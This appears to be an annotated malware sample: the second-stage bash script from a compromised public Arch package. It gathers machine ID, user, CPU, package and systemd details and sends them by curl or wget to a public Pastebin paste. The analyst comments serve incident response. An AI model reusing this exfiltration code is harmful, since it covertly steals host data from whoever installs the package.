@campuscodi
Created July 10, 2018 20:49
~u file downloaded as 2nd stage payload in public Arch package compromise
#!/bin/bash
# urle: stdin-to-stdout filter that rewrites a fixed set of URL-reserved
# characters as %XX escapes through one chain of sed substitutions.
# Analyst notes on what the expressions do as written:
#   - none of them carries the `g` flag, so each rewrites only the first
#     match on a line;
#   - in `s|$|%24|` the `$` is sed's end-of-line anchor, so `%24` is appended
#     to each line rather than replacing a literal dollar sign;
#   - space and `%` are not in the list and pass through unchanged.
function urle() {
sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|'
}
# Mark the urle function for export so child bash processes inherit it.
declare -fx urle
# NOTE(review): GID is assigned an empty value and is not referenced again in
# this listing; its purpose is not evident from the sample.
GID=
# Host identifier: the contents of /etc/machine-id. It is reused below as the
# paste title suffix and as the first line of the collected report.
MACHINE_ID="$(cat /etc/machine-id)"
# Paste title: the literal tag "[xeactor]", a space and the machine ID, passed
# through urle. The "[xeactor]" tag is a fixed string in this sample and is
# usable as a search term when hunting for related pastes or copies.
PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)"
# upload: exfiltration routine. Sends its first argument as the body of a new
# paste via an HTTP POST to the Pastebin API.
# Globals:   HTTP_CLIENT (read), PASTE_TITLE (read), up_data/prefix (written,
#            not declared local)
# Arguments: $1 - text to send
# Outputs:   none; the client's stdout and stderr are discarded
# Network indicators visible here: the endpoint
# https://pastebin.com/api/api_post.php, a hard-coded api_dev_key value, and
# api_paste_private=0 (the "public" visibility value in Pastebin's API).
upload() {
# $1 is unquoted, so word splitting collapses newlines and runs of whitespace
# into single spaces before the text reaches urle.
up_data="$(echo $1|urle)"
# Choose the POST command line to match whichever client was detected.
if [[ "$HTTP_CLIENT" == "curl" ]]; then
prefix='curl -s --data'
elif [[ "$HTTP_CLIENT" == "wget" ]]; then
prefix='wget -O/dev/null -q --post-data'
fi
# $prefix is left unquoted on purpose so it splits into command plus options.
# All output is sent to /dev/null, so the request leaves no terminal trace.
$prefix "api_dev_key=42ba93112cc9677382e55e5e387eafa1&api_paste_private=0&api_paste_name=${PASTE_TITLE}&api_option=paste&api_paste_code=$up_data" "https://pastebin.com/api/api_post.php" >/dev/null 2>&1
}
# HTTP client discovery: wget is preferred, curl is the fallback. The choice is
# exported as HTTP_CLIENT for upload() to read.
if which wget >/dev/null 2>&1; then
export HTTP_CLIENT=wget
elif which curl >/dev/null 2>&1; then
export HTTP_CLIENT=curl
else
# Neither client is installed: stop with a success status, so the script
# exits without output or an error code on such hosts.
exit 0
fi
# cmd_log: print a "[cmd] `<command line>`:" header, run the command given as
# arguments with stderr merged into stdout, then print an empty line.
cmd_log() { echo "[cmd] \`$@\`:"; "$@" 2>&1; echo; }
# full_log: build the host inventory report on stdout. This defines the scope
# of data exposure for an affected machine: machine ID, current epoch time,
# kernel/host string, the invoking user's uid/gid/groups, CPU details, the
# installed package lists and the systemd unit list.
full_log() {
echo ${MACHINE_ID}
cmd_log date '+%s'
cmd_log uname -a
cmd_log id
cmd_log lscpu
# pacman -Q queries the local package database; -e restricts to explicitly
# installed packages, -d to packages installed as dependencies, -q prints
# names only.
cmd_log pacman -Qeq
cmd_log pacman -Qdq
cmd_log systemctl list-units
}
# Main sequence: collect the report once, attempt to send it, then leave a
# copy on disk.
FULL_LOG="$(full_log)"
# NOTE(review): `uploader` is never assigned anywhere in this listing, so the
# variable expands to nothing and the shell attempts to run the report text
# itself as a command name. As listed, upload() is not invoked by this line;
# confirm against network logs before concluding whether data left the host.
$uploader "$FULL_LOG"
# Host indicator: for /root and every directory under /home, the report is
# written to compromised.txt. The -w test is true only when that file already
# exists and is writable, so this stage overwrites an existing file rather than
# creating one (presumably placed by an earlier stage - not shown here).
for x in /root /home/*; do
if [[ -w "$x/compromised.txt" ]]; then
echo "$FULL_LOG" > "$x/compromised.txt"
fi
done
# Always report success to the caller.
exit 0